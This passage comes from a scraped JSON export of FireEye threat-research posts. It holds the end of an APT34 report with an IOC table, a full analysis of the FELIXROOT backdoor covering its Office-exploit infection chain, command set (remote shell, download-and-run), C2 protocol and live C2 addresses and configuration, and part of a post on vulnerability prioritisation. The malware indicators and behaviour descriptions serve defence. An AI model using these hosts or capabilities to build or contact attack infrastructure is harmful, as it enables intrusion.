from:\n\nhxxp://94.23.172.164/dupdatechecker.doc.\n\nAs shown in Figure 12, the script within the dupatechecker.doc file attempts to download another file named dupatechecker.exe from the same server. The file also contains a comment by the malware author that appears to be an apparent taunt to security researchers.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig12.png) \nFigure 12: Contents of dupdatechecker.doc script\n\nThe dupatechecker.exe file (MD5: C9F16F0BE8C77F0170B9B6CE876ED7FB) drops both BONDUPDATER and POWRUNER. These files connect to proxychecker[.]pro for C2.\n\n#### Outlook and Implications\n\nRecent activity by APT34 demonstrates that they are capable group with potential access to their own development resources. During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities (CVE-2017-0199 and CVE-2017-11882)** **to target organizations in the Middle East. We assess that APT34\u2019s efforts to continuously update their malware, including the incorporation of DGA for C2, demonstrate the group\u2019s commitment to pursing strategies to deter detection. We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region.\n\n#### IOCs\n\n**Filename / Domain / IP Address**\n\n| \n\n**MD5 Hash or Description** \n \n---|--- \n \nCVE-2017-11882 exploit document\n\n| \n\nA0E6933F4E0497269620F44A083B2ED4 \n \nb.txt\n\n| \n\n9267D057C065EA7448ACA1511C6F29C7 \n \nv.txt/v.vbs\n\n| \n\nB2D13A336A3EB7BD27612BE7D4E334DF \n \ndUpdateCheckers.base\n\n| \n\n4A7290A279E6F2329EDD0615178A11FF \n \nhUpdateCheckers.base\n\n| \n\n841CE6475F271F86D0B5188E4F8BC6DB \n \ncUpdateCheckers.bat\n\n| \n\n52CA9A7424B3CC34099AD218623A0979 \n \ndUpdateCheckers.ps1\n\n| \n\nBBDE33F5709CB1452AB941C08ACC775E \n \nhUpdateCheckers.ps1\n\n| \n\n247B2A9FCBA6E9EC29ED818948939702 \n \nGoogleUpdateschecker.vbs\n\n| \n\nC87B0B711F60132235D7440ADD0360B0 \n \nhxxp://mumbai-m[.]site\n\n| \n\nPOWRUNER C2 \n \nhxxp://dns-update[.]club\n\n| \n\nMalware Staging Server \n \nCVE-2017-0199 exploit document\n\n| \n\n63D66D99E46FB93676A4F475A65566D8 \n \n94.23.172.164:80\n\n| \n\nMalware Staging Server \n \ndupdatechecker.doc\n\n| \n\nD85818E82A6E64CA185EDFDDBA2D1B76 \n \ndupdatechecker.exe\n\n| \n\nC9F16F0BE8C77F0170B9B6CE876ED7FB \n \nproxycheker[.]pro\n\n| \n\nC2 \n \n46.105.221.247\n\n| \n\nHas resolved mumbai-m[.]site & hpserver[.]online \n \n148.251.55.110\n\n| \n\nHas resolved mumbai-m[.]site and dns-update[.]club \n \n185.15.247.147\n\n| \n\nHas resolved dns-update[.]club \n \n145.239.33.100\n\n| \n\nHas resolved dns-update[.]club \n \n82.102.14.219\n\n| \n\nHas resolved ns2.dns-update[.]club & hpserver[.]online & anyportals[.]com \n \nv7-hpserver.online.hta\n\n| \n\nE6AC6F18256C4DDE5BF06A9191562F82 \n \ndUpdateCheckers.base\n\n| \n\n3C63BFF9EC0A340E0727E5683466F435 \n \nhUpdateCheckers.base\n\n| \n\nEEB0FF0D8841C2EBE643FE328B6D9EF5 \n \ncUpdateCheckers.bat\n\n| \n\nFB464C365B94B03826E67EABE4BF9165 \n \ndUpdateCheckers.ps1\n\n| \n\n635ED85BFCAAB7208A8B5C730D3D0A8C \n \nhUpdateCheckers.ps1\n\n| \n\n13B338C47C52DE3ED0B68E1CB7876AD2 \n \ngoogleupdateschecker.vbs\n\n| \n\nDBFEA6154D4F9D7209C1875B2D5D70D5 \n \nhpserver[.]online\n\n| \n\nC2 \n \nv7-anyportals.hta\n\n| \n\nEAF3448808481FB1FDBB675BC5EA24DE \n \ndUpdateCheckers.base\n\n| \n\n42449DD79EA7D2B5B6482B6F0D493498 \n \nhUpdateCheckers.base\n\n| \n\nA3FCB4D23C3153DD42AC124B112F1BAE \n \ndUpdateCheckers.ps1\n\n| \n\nEE1C482C41738AAA5964730DCBAB5DFF \n \nhUpdateCheckers.ps1\n\n| \n\nE516C3A3247AF2F2323291A670086A8F \n \nanyportals[.]com\n\n| \n\nC2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-07T12:00:00", "type": "fireeye", "title": "New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-0199"], "modified": "2017-12-07T12:00:00", "id": "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "href": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-06T21:43:11", "description": "#### Campaign Details\n\nIn September 2017, FireEye identified the FELIXROOT backdoor as a payload in a campaign targeting Ukrainians and reported it to our intelligence customers. The campaign involved malicious Ukrainian bank documents, which contained a macro that downloaded a FELIXROOT payload, being distributed to targets.\n\nFireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) and [CVE-2017-11882](<https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html>) to drop and execute the backdoor binary on the victim\u2019s machine. Figure 1 shows the attack overview.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig1a.png) \nFigure 1: Attack overview\n\nThe malware is distributed via Russian-language documents (Figure 2) that are weaponized with known Microsoft Office vulnerabilities. In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware. The malicious document used is named \u201cSeminar.rtf\u201d. It exploits CVE-2017-0199 to download the second stage payload from 193.23.181.151 (Figure 3). The downloaded file is weaponized with CVE-2017-11882.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig2.png) \nFigure 2: Lure documents\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig3.png) \nFigure 3: Hex dump of embedded URL in Seminar.rtf\n\nFigure 4 shows the first payload trying to download the second stage Seminar.rtf.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig4.png) \nFigure 4: Downloading second stage Seminar.rtf\n\nThe downloaded Seminar.rtf contains an embedded binary file that is dropped in %temp% via Equation Editor executable. This file drops the executable at %temp% (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9), which is used to drop and execute the FELIXROOT dropper component (MD5: 92F63B1227A6B37335495F9BCB939EA2).\n\nThe dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section. When it is executed, it creates two files: an LNK file that points to %system32%\\rundll32.exe, and the FELIXROOT loader component. The LNK file is moved to the startup directory. Figure 5 shows the command in the LNK file to execute the loader component of FELIXROOT.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig5.png) \nFigure 5: Command in LNK file\n\nThe embedded backdoor component is encrypted using custom encryption. The file is decrypted and loaded directly in memory without touching the disk.\n\n#### Technical Details\n\nAfter successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function.\n\nStrings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key. Decryption logic used for ASCII strings is shown in Figure 6.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig6.png) \nFigure 6: ASCII decryption routine\n\nDecryption logic used for Unicode strings is shown in Figure 7.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig7.png) \nFigure 7: Unicode decryption routine\n\nUpon execution, a new thread is created where the backdoor sleeps for 10 minutes. Then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If the malware was launched by RUNDLL32.exe with parameter #1, then it proceeds with initial system triage before doing command and control (C2) network communications. Initial triage begins with connecting to Windows Management Instrumentation (WMI) via the \u201cROOT\\CIMV2\u201d namespace.\n\nFigure 8 shows the full operation.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig8.png) \nFigure 8: Initial execution process of backdoor component\n\nTable 1 shows the classes referred from the \u201cROOT\\CIMV2\u201d and \u201cRoot\\SecurityCenter2\u201d namespace.\n\n**WMI Namespaces** \n \n--- \n \nWin32_OperatingSystem \n \nWin32_ComputerSystem \n \nAntiSpywareProduct \n \nAntiVirusProduct \n \nFirewallProduct \n \nWin32_UserAccount \n \nWin32_NetworkAdapter \n \nWin32_Process \n \nTable 1: Referred classes\n\n#### WMI Queries and Registry Keys Used\n\n 1. SELECT Caption FROM Win32_TimeZone\n 2. SELECT CSNAME, Caption, CSDVersion, Locale, RegisteredUser FROM Win32_OperatingSystem\n 3. SELECT Manufacturer, Model, SystemType, DomainRole, Domain, UserName FROM Win32_ComputerSystem\n\nRegistry entries are read for potential administration escalation and proxy information.\n\n 1. Registry key \u201c**SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System** \u201d is queried to check the values **ConsentPromptBehaviorAdmin **and** PromptOnSecureDesktop.**\n 2. Registry key \u201c**Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\**\u201d is queried to gather proxy information with values **ProxyEnable, Proxy: (NO), Proxy, ProxyServer.**\n\nTable 2 shows FELIXROOT backdoor capabilities. Each command is performed in an individual thread.\n\n**Command**\n\n| \n\n**Description** \n \n---|--- \n \n0x31\n\n| \n\nFingerprint System via WMI and Registry \n \n0x32\n\n| \n\nDrop File and execute \n \n0x33\n\n| \n\nRemote Shell \n \n0x34\n\n| \n\nTerminate connection with C2 \n \n0x35\n\n| \n\nDownload and run batch script \n \n0x36\n\n| \n\nDownload file on machine \n \n0x37\n\n| \n\nUpload File \n \nTable 2: FELIXROOT backdoor commands\n\nFigure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig9.png) \nFigure 9: Command logs after execution\n\n#### Network Communications\n\nFELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server (Figure 10).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig10.png) \nFigure 10: POST request to C2 server\n\nAll other fields, such as User-Agents, Content-Type, and Accept-Encoding, that are part of the request / response header are XOR encrypted and present in the malware. The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, processor architecture and two additional values, which are \u201c1.3\u201d and \u201cKdfrJKN\u201d. The value \u201cKdfrJKN\u201d may be used as identification for the campaign and is found in the JOSN object in the file (Figure 11).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig11.png) \nFigure 11: Host information used in every communication\n\nThe FELIXROOT backdoor has three parameters for C2 communication. Each parameter provides information about the task performed on the target machine (Table 3).\n\n**Parameter**\n\n| \n\n**Description** \n \n---|--- \n \n\u2018u=\u2019\n\n| \n\nThis parameter contains target machine information in the following format:\n\n<Computer Name>, <User Name>, <Windows Versions>, <Processor Architecture>, <1.3>, < KdfrJKN >, <Volume Serial Number> \n \n\u2018&h=\u2019\n\n| \n\nThis parameter includes the information about the command executed and its results. \n \n\u2018&p=\u2019\n\n| \n\nThis parameter contains the information about data associated with the C2 server. \n \nTable 3: FELIXROOT backdoor parameters\n\n**Cryptography**\n\nAll data is transferred to C2 servers using AES encryption and the **IbindCtx **COM interface using HTTP or HTTPS protocol. The AES key is unique for each communication and is encrypted with one of two RSA public keys. Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig12.png) \nFigure 12: RSA public key 1\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig13.png) \nFigure 13: RSA public key 2\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig14.png) \nFigure 14: AES encryption parameters\n\nAfter encryption, the cipher text to be sent over C2 is Base64 encoded. Figure 15 shows the structure used to send data to the server, and Figure 16 shows the structural representation of data used in C2 communications.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig15.png) \nFigure 15: Structure used to send data to server\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/FELIXROOT/Fig16.png) \nFigure 16: Structure used to send data to C2 server\n\nThe structure is converted to Base64 using the **CryptBinaryToStringA** function.\n\nFELIXROOT backdoor contains several commands for specific tasks. After execution of every task, the malware sleeps for one minute before executing the next task. Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine:\n\n 1. Deletes the LNK file from the startup directory.\n 2. Deletes the registry key **HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open**\n 3. Deletes the dropper components from the system.\n\n#### Conclusion\n\nCVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected. At this time of writing, FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. We also advise that all industries remain on alert, as the threat actors involved in this campaign may eventually broaden the scope of their current targeting.\n\n#### Appendix\n\n##### Indicators of Compromise\n\n11227ECA89CC053FB189FAC3EBF27497\n\n| \n\nSeminar.rtf \n \n---|--- \n \n4DE5ADB865B5198B4F2593AD436FCEFF\n\n| \n\nSeminar.rtf \n \n78734CD268E5C9AB4184E1BBE21A6EB9\n\n| \n\nZam<RandomNumber>.doc \n \n92F63B1227A6B37335495F9BCB939EA2\n\n| \n\nFELIXROOT Dropper \n \nDE10A32129650849CEAF4009E660F72F\n\n| \n\nFELIXROOT Backdoor \n \nTable 4: FELIXROOT IOCs****\n\n##### Network Indicators of Compromise\n\n217.12.204.100/news\n\n217.12.204.100:443/news\n\n193.23.181.151/Seminar.rtf\n\nAccept-Encoding: gzip, deflate\n\ncontent-Type: application/x-www-form-urlencoded\n\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\n\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\n\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\n\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\n\n##### Configuration Files\n\n_Version 1:_\n\n{\"1\" : \"https://88.198.13.116:8443/xmlservice\",\"2\" : \"30\",\"4\" : \"GufseGHbc\",\"6\" : \"3\", \"7\" :\n\n\u201chttp://88.198.13.116:8080/xmlservice\"}\n\n_Version 2:_\n\n{\"1\" : \"https://217.12.204.100/news/\",\"2\" : \"30\",\"4\" : \"KdfrJKN\",\"6\" : \"3\", \"7\" :\n\n\"http://217.12.204.100/news/\"}\n\n##### FireEye Detections\n\nMD5\n\n| \n\nProduct\n\n| \n\nSignature\n\n| \n\nAction \n \n---|---|---|--- \n \n11227ECA89CC053FB189FAC3EBF27497\n\n| \n\nNX/EX/AX\n\n| \n\nMalware.Binary.rtf\n\n| \n\nBlock \n \n4DE5ADB865B5198B4F2593AD436FCEFF\n\n| \n\nNX/EX/AX\n\n| \n\nMalware.Binary.rtf\n\n| \n\nBlock \n \n78734CD268E5C9AB4184E1BBE21A6EB9\n\n| \n\nNX/EX/AX\n\n| \n\nMalware.Binary\n\n| \n\nBlock \n \n92F63B1227A6B37335495F9BCB939EA2\n\n| \n\nNX/EX/AX\n\n| \n\nFE_Dropper_Win32_FELIXROOT_1\n\n| \n\nBlock \n \nDE10A32129650849CEAF4009E660F72F\n\n| \n\nNX/EX/AX\n\n| \n\nFE_Backdoor_Win32_FELIXROOT_2\n\n| \n\nBlock \n \n11227ECA89CC053FB189FAC3EBF27497\n\n| \n\nHX\n\n| \n\nIOC\n\n| \n\nAlert \n \n4DE5ADB865B5198B4F2593AD436FCEFF\n\n| \n\nHX\n\n| \n\nIOC\n\n| \n\nAlert \n \nTable 5: FireEye Detections\n\n#### Acknowledgements\n\nSpecial thanks to Jonell Baltazar, Alex Berry and Benjamin Read for their contributions to this blog.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-26T10:00:00", "type": "fireeye", "title": "Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-0199"], "modified": "2018-07-26T10:00:00", "id": "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "href": "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T16:41:57", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations._\n\nOrganizations often have to make difficult choices when it comes to patch prioritization. Many are faced with securing complex network infrastructure with thousands of systems, different operating systems, and disparate geographical locations. Even when armed with a simplified vulnerability rating system, it can be hard to know where to start. This problem is compounded by the ever-changing threat landscape and increased access to zero-days.\n\nAt FireEye, we apply the rich body of knowledge accumulated over years of global intelligence collection, incident response investigations, and device detections, to help our customers defend their networks. This understanding helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations. \n\nIn this blog post, we\u2019ll demonstrate how we apply intelligence to help organizations assess risk and make informed decisions about vulnerability management and patching in their environments.\n\n#### Functions of Vulnerability Intelligence\n\nVulnerability intelligence helps clients to protect their organizations, assets, and users in three main ways:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnintel/Picture1.png) \nFigure 1: Vulnerability intelligence can help with risk assessment and informed decision making\n\n#### Tailoring Vulnerability Prioritization\n\nWe believe it is important for organizations to build a defensive strategy that prioritizes the types of threats that are most likely to impact their environment, and the threats that could cause the most damage. When organizations have a clear picture of the spectrum of threat actors, malware families, campaigns, and tactics that are most relevant to their organization, they can make more nuanced prioritization decisions when those threats are linked to exploitation of vulnerabilities. A lower risk vulnerability that is actively being exploited in the wild against your organization or similar organizations likely has a greater potential impact to you than a vulnerability with a higher rating that is not actively being exploited.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnintel/Picture2.png) \nFigure 2: Patch Prioritization Philosophy\n\n#### Integration of Vulnerability Intelligence in Internal Workflows\n\nBased on our experience assisting organizations globally with enacting intelligence-led security, we outline three use cases for integrating vulnerability intelligence into internal workflows.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnintel/Picture3.png) \nFigure 3: Integration of vulnerability intelligence into internal workflows\n\n**Tools and Use Cases for Operationalizing Vulnerability Intelligence**\n\n_1\\. Automate Processes by Fusing Intelligence with Internal Data_\n\nAutomation is valuable to security teams with limited resources. Similar to automated detecting and blocking of indicator data, vulnerability threat intelligence can be automated by merging data from internal vulnerability scans with threat intelligence (via systems like the Mandiant [Intelligence API](<https://www.fireeye.com/solutions/cyber-threat-intelligence/threat-intelligence-subscriptions/intelligence-api.html>)) and aggregated into a SIEM, Threat Intelligence Platform, and/or ticketing system. This enhances visibility into various sources of both internal and external data with vulnerability intelligence providing risk ratings and indicating which vulnerabilities are being actively exploited. FireEye also offers a custom tool called FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d), described in more detail below for quickly correlating vulnerabilities found in logs and scans with Mandiant ratings.\n\nSecurity teams can similarly automate communication and workflow tracking processes using threat intelligence by defining rules for auto-generating tickets based on certain combinations of Mandiant risk and exploitation ratings; for example, internal service-level-agreements (SLAs) could state that \u2018high\u2019 risk vulnerabilities that have an exploitation rating of \u2018available,\u2019 \u2018confirmed,\u2019 or \u2018wide\u2019 must be patched within a set number of days. Of course, the SLA will depend on the company\u2019s operational needs, the capability of the team that is advising the patch process, and executive buy-in to the SLA process. Similarly, there may be an SLA defined for patching vulnerabilities that are of a certain age. Threat intelligence tells us that adversaries continue to use older vulnerabilities as long as they remain effective. For example, as recently as January 2020, we observed a Chinese cyber espionage group use an exploit for CVE-2012-0158, a Microsoft Office stack-based buffer overflow vulnerability originally released in 2012, in malicious email attachments to target organizations in Southeast Asia. Automating the vulnerability-scan-to-vulnerability-intelligence correlation process can help bring this type of issue to light. \n\nAnother potential use case employing automation would be incorporating vulnerability intelligence as security teams are testing updates or new hardware and software prior to introduction into the production environment. This could dramatically reduce the number of vulnerabilities that need to be patched in production and help prioritize those vulnerabilities that need to be patched first based on your organization\u2019s unique threat profile and business operations.\n\n_2\\. Communicating with Internal Stakeholders_\n\nTeams can leverage vulnerability reporting to send internal messaging, such as flash-style notifications, to alert other teams when Mandiant rates a vulnerability known to impact your systems high or critical. These are the vulnerabilities that should take priority in patching and should be patched outside of the regular cycle.\n\nData-informed intelligence analysis may help convince stakeholders outside of the security organization the importance of patching quickly, even when this is inconvenient to business operations. Threat Intelligence can inform an organization\u2019s appropriate use of resources for security given the potential business impact of security incidents.\n\n_3\\. Threat Modeling_\n\nOrganizations can leverage vulnerability threat intelligence to inform their threat modeling to gain insight into the most likely threats to their organization, and better prepare to address threats in the mid to long term. Knowledge of which adversaries pose the greatest threat to your organization, and then knowledge of which vulnerabilities those threat groups are exploiting in their operations, can enable your organization to build out security controls and monitoring based on those specific CVEs.\n\n#### Examples\n\nThe following examples illustrate workflows supported by vulnerability threat intelligence to demonstrate how organizations can operationalize threat intelligence in their existing security teams to automate processes and increase efficiency given limited resources.\n\n_Example 1: Using FIVE for Ad-hoc Vulnerability Prioritization_\n\nThe FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d) tool is available for customers [here](<https://fireeye.market/apps?query=five>). It is available for MacOS and Windows, requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnintel/Picture4.png) \nFigure 4: FIVE Tool for Windows and MacOS\n\nIn this scenario, an organization\u2019s intelligence team was asked to quickly identify any vulnerability that required patching from a server vulnerability scan after that server was rebuilt from a backup image. The intelligence team was presented with a text file containing a list of CVE numbers. Users can drag-and-drop a text readable file (CSV, TEXT, JSON, etc.) into the FIVE tool and the CVE numbers will be discovered from the file using regex. As shown in Figure 6 (below), in this example, the following vulnerabilities were found in the file and presented to the user. \n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnintel/Picture5.png) \nFigure 5: FIVE tool startup screen waiting for file input\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnintel/Picture6.png) \nFigure 6: FIVE tool after successfully regexing the CVE-IDs from the file\n\nAfter selecting all CVE-IDs, the user clicked the \u201cFetch Vulnerabilities\u201d button, causing the application to make the necessary two-stage API call to the Intelligence API.\n\nThe output depicted in Figure 7 shows the user which vulnerabilities should be prioritized based on FireEye\u2019s risk and exploitation ratings. The red and maroon boxes indicate vulnerabilities that require attention, while the yellow indicate vulnerabilities that should be reviewed for possible action. Details of the vulnerabilities are displayed below, with associated intelligence report links providing further context.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/vulnintel/Picture7.png) \nFigure 7: FIVE tool with meta-data, CVE-IDs, and links to related Intelligence Reports\n\nFIVE can also facilitate other use cases for vulnerability intelligence. For example, this chart can be attached in messaging to other internal stakeholders or executives for review, as part of a status update to provide visibility on the organization\u2019s vulnerability management program.\n\n_Example 2: Vulnerability Prioritization, Internal Communications, Threat Modeling_\n\nCVE-2019-19781 is a vulnerability affecting Citrix that Mandiant Threat Intelligence rated critical. Mandiant discussed early exploitation of this vulnerability in a January 2020 blog post. We continued to monitor for additional exploitation, and informed our clients when we observed exploitation by ransomware operators and Chinese espionage group, APT41.\n\nIn cases like these, threat intelligence can help impacted organizations find the \u201csignal\u201d in the \u201cnoise\u201d and prioritize patching using knowledge of exploitation and the motives and targeting patterns of threat actors behind the exploitation. Enterprises can use intelligence to inform internal stakeholders of the potential risk and provide context as to the potential business and financial impact of a ransomware infection or an intrusion by a highly resourced state sponsored group. This support the immediate patch prioritization decision while simultaneously emphasizing the value of a holistically informed security organization.\n\n_Example 3: Intelligence Reduces Unnecessary Resource Expenditure \u2014 Automating Vulnerability Prioritization and Communications_\n\nAnother common application for vulnerability intelligence is informing security teams and stakeholders when to stand down. When a vulnerability is reported in the media, organizations often spin up resources to patch as quickly as possible. Leveraging threat intelligence in security processes help an organization discern when it is necessary to respond in an all-hands-on-deck manner.\n\nTake the case of the [CVE-2019-12650](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12650>), originally disclosed on Sept. 25, 2019 with an NVD rating of \u201cHigh.\u201d Without further information, an organization relying on this score to determine prioritization may include this vulnerability in the same patch cycle along with numerous other vulnerabilities rated High or Critical. As previously discussed, we have experts review the vulnerability and determine that it required the highest level of privileges available to successfully exploit, and there was no evidence of exploitation in the wild.\n\nThis is a case where threat intelligence reporting as well as automation can effectively minimize the need to unnecessarily spin up resources. Although the public NVD score rated this vulnerability high, Mandiant Intelligence rated it as \u201clow\u201d risk due to the high level of privileges needed to use it and lack of exploitation in the wild. Based on this assessment, organizations may decide that this vulnerability could be patched in the regular cycle and does not necessitate use of additional resources to patch out-of-band. When Mandiant ratings are automatically integrated into the patching ticket generation process, this can support efficient prioritization. Furthermore, an organization could use the analysis to issue an internal communication informing stakeholders of the reasoning behind lowering the prioritization.\n\n#### Vulnerabilities: Managed\n\nBecause we have been closely monitoring vulnerability exploitation trends for years, we were able to distinguish when attacker use of zero-days evolved from use by a select class of highly skilled attackers, to becoming accessible to less skilled groups with enough money to burn. Our observations consistently underscore the speed with which attackers exploit useful vulnerabilities, and the lack of exploitation for vulnerabilities that are hard to use or do not help attackers fulfill their objectives. Our understanding of the threat landscape helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations.\n\nMandiant Threat Intelligence enables organizations to implement a defense-in-depth approach to holistically mitigate risk by taking all feasible steps\u2014not just patching\u2014to prevent, detect, and stymie attackers at every stage of the attack lifecycle with both technology and human solutions.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n\n**Additional Resources**\n\nZero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill \u2014 Intelligence for Vulnerability Management, Part One\n\nThink Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part 